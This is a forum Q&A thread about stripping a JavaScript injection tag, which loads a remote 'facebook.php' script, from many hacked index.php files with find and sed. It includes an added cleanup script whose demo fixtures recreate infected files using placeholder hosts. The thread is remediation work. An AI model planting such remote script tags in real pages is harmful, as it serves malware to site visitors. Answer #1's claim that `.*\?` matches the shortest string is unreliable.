Linux command line: editing hacked index files

Time: 2021-11-23 00:14:18

I'm unfortunately once more dealing with a hacked site on a Linux Plesk server. While the issue is fixed with the FTP access changed (it came down to the famous FileZilla FTP password hack on a PC), I'd appreciate knowing how to edit the files, as it may take over an hour to restore the site to the most recent backup we have, and I'd be glad to have it back online faster. The hack is rather simple: a JavaScript snippet was inserted into many index* (only index.php, it seems) files in the site. I'm looking for a way to mass-edit the hacked files, knowing that even though the target JavaScript code is the same, it is called from a number of probably also hacked sites. So while my legitimate index file used to start with

<?php

it now starts like

<script type="text/javascript" src="http://(RANDOMDOMAINHERE)/facebook.php"></script><?php

As that string contains a variable part, could you help me find a sure-fire method to edit all the changed index files (about 80 found)? I have used a sed replace before, but this time part of the string to replace varies, so could I use a wildcard? Best regards, thanks for shedding light!

3 solutions

#1

3

find -name 'index.php' -print0 |
    xargs -0 sed -i '1s#^<script type="text/javascript" src="http://.*\?/facebook.php"></script>##g'

Should do wonders

The sed command:

  • 1 (match in first line)
  • s#pattern#replacement#g (replace pattern by replacement; note that the latter is empty)
  • ^ must match at start of line
  • .*\? accept arbitrary length of sequence of characters; however if more than one match for the whole pattern could be made, only match the shortest possible variant of it

Cheers
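A safer variant of the one-liner above, written as an added example for this thread (it is not the answerer's or the asker's code): it first lists the affected files read-only, keeps a copy of every file it changes for the incident record, and confines the wildcard to the src attribute. In GNU sed's basic regex, `\?` only makes the preceding `.*` optional; sed has no shortest-match operator, so a plain `.*` would swallow everything up to the last `/facebook.php"></script>` on line 1 if two tags had been injected. Using `[^"]*` for the host part avoids that. The host names, the directory layout and the sample index.php files are constructed for the demo, and GNU sed -i is assumed.

```shell
#!/bin/sh
# Added example (not from the original thread): find index.php files whose
# first line starts with an injected <script ... src="http://HOST/facebook.php">
# tag, list them read-only first, then strip the tag with a backup of each file.
# The directory layout and the sample files in make_demo_tree are constructed.

# BRE used by both grep and sed. The host part is [^"]* rather than .*, so the
# match can never run past the closing quote of src= into the rest of line 1.
INJECT_RE='^<script type="text/javascript" src="http://[^"]*/facebook\.php"></script>'

# True if the first line of $1 starts with the injected tag (file is not modified).
is_infected() {
    head -n 1 "$1" | grep -q -e "$INJECT_RE"
}

# Print every index.php under directory $1 that is infected; read-only dry run.
list_infected() {
    find "$1" -type f -name 'index.php' | while IFS= read -r f; do
        if is_infected "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Number of infected index.php files under $1.
count_infected() {
    list_infected "$1" | wc -l | tr -d ' '
}

# Keep a copy of the tampered file for the incident record, then remove the
# tag from line 1 only. GNU sed -i is assumed (BSD sed needs -i '').
clean_file() {
    cp -p "$1" "$1.hacked.bak"
    sed -i "1s#$INJECT_RE##" "$1"
}

# Clean every infected index.php under $1 and report each file touched.
clean_tree() {
    list_infected "$1" | while IFS= read -r f; do
        clean_file "$f"
        printf 'cleaned: %s\n' "$f"
    done
}

# Build a throwaway site tree with two infected and one clean index.php
# (constructed sample data, hypothetical .invalid hosts) and print its root.
make_demo_tree() {
    root=$(mktemp -d)/site
    mkdir -p "$root/blog" "$root/shop"
    tag1='<script type="text/javascript" src="http://injected-host.invalid/facebook.php"></script>'
    tag2='<script type="text/javascript" src="http://another-host.invalid/facebook.php"></script>'
    printf '%s<?php\necho "home";\n' "$tag1" > "$root/index.php"
    printf '%s<?php\necho "blog";\n' "$tag2" > "$root/blog/index.php"
    printf '<?php\necho "shop";\n' > "$root/shop/index.php"
    printf '%s\n' "$root"
}

# Usage: sh clean_index.sh list DIR   (dry run, prints affected files)
#        sh clean_index.sh clean DIR  (strips the tag, leaves *.hacked.bak copies)
main() {
    case "$1" in
        list)  list_infected "$2" ;;
        clean) clean_tree "$2" ;;
        *)     echo "usage: $0 list|clean DIR" >&2; return 2 ;;
    esac
}

if [ "$#" -gt 0 ]; then
    main "$@"
fi
```

Run `list` against the document root first and compare the count with what you expect; if it is far off, the injected tag is not on line 1 of some files or a second form of injection is present, and a backup restore is the better route. The `.hacked.bak` copies are there so the original tampered files can be examined later; delete them once the incident is closed.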

#2

1

I sincerely hope you're not actually administering a production domain. You should inform your users, get the problem fixed, and offer the users to go back to a recent backup that hasn't got the problem.

There is no telling what else has been tampered with.

I'm glad my VPS is somewhere else!

#3

-1

I would fix the cross-site scripting exploit before this problem is addressed, or it will all be in vain. When that's done, a simple search and replace of blocks of script that contain a common string should be sufficient.
